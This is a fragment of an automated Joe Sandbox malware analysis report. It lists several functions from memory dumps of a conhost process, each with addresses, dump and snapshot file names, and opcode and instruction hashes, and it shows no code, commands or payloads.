                                                                                                • Opcode ID: 73c4eea8d5fd7ee54f4ef704b5878736710ad86fb46bd5762e653c68637d7c5e
                                                                                                • Instruction ID: 4dba96596e80f47223296c7c23f94e70163d3ee1994bf7eb2f60c1afda9a3506
                                                                                                • Opcode Fuzzy Hash: 73c4eea8d5fd7ee54f4ef704b5878736710ad86fb46bd5762e653c68637d7c5e
                                                                                                • Instruction Fuzzy Hash: 87E0CD3061B6484FCF44DF3DCC095147BD1FB59501B49C2BE944DCB2A2CE55D8854301
                                                                                                Function 00007FFD9B885A16 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 870243141dd7990a0185a18ac1a50ac2a77a54213ccd36e8ede696c6bdef635b
                                                                                                • Instruction ID: 2f6ee3fec663a85419f582050012b29c54db3e2986bb3052b50fe47439498add
                                                                                                • Opcode Fuzzy Hash: 870243141dd7990a0185a18ac1a50ac2a77a54213ccd36e8ede696c6bdef635b
                                                                                                • Instruction Fuzzy Hash: 01E0D871E25C1A0BE7B1F75884D56B423D1E71C340F1501B1C828D32A1DE386D814781
                                                                                                Function 00007FFD9B893A40 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                Function 00007FFD9B883DB4 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f2c0e5def1d3d59bb26f377754146174647e5addb9f86df912c2841c9269ac66
                                                                                                • Instruction ID: 96e0d7a0bcaf6762c9a7b40b30b3e87487ef78e3eb26263cc39ac91a18b40c1d
                                                                                                • Opcode Fuzzy Hash: f2c0e5def1d3d59bb26f377754146174647e5addb9f86df912c2841c9269ac66
                                                                                                • Instruction Fuzzy Hash: D3C0EA20F2AD1E9BEAA8B3A884662B951C65F4C700B560474D1AED32E2DD2DAA404A50
                                                                                                Function 00007FFD9B886802 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b252ab7d853b7a7ce2735f057feeb795ea4443b1ff1f74f8770849f1a297f874
                                                                                                • Instruction ID: d02332c6764806ac7eadfc11aa089a4a2e42208b49c495d1a469f046ccd1ae0c
                                                                                                • Opcode Fuzzy Hash: b252ab7d853b7a7ce2735f057feeb795ea4443b1ff1f74f8770849f1a297f874
                                                                                                • Instruction Fuzzy Hash: CFC04C14F19C2A47E3696218483167D04929B48754F950074E46D976DECD2C5A1216C7
                                                                                                Function 00007FFD9B8A25D0 Relevance: .0, Instructions: 7COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction ID: e425a0db9fe55fa0ec8003d36a69f58f0e46986591355cacf7f74b1150c8a269
                                                                                                • Opcode Fuzzy Hash: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction Fuzzy Hash: C5A00205D97C0E02D81832FA2E9709474545F8E115FC62AA0EC188059AEA9E26E94393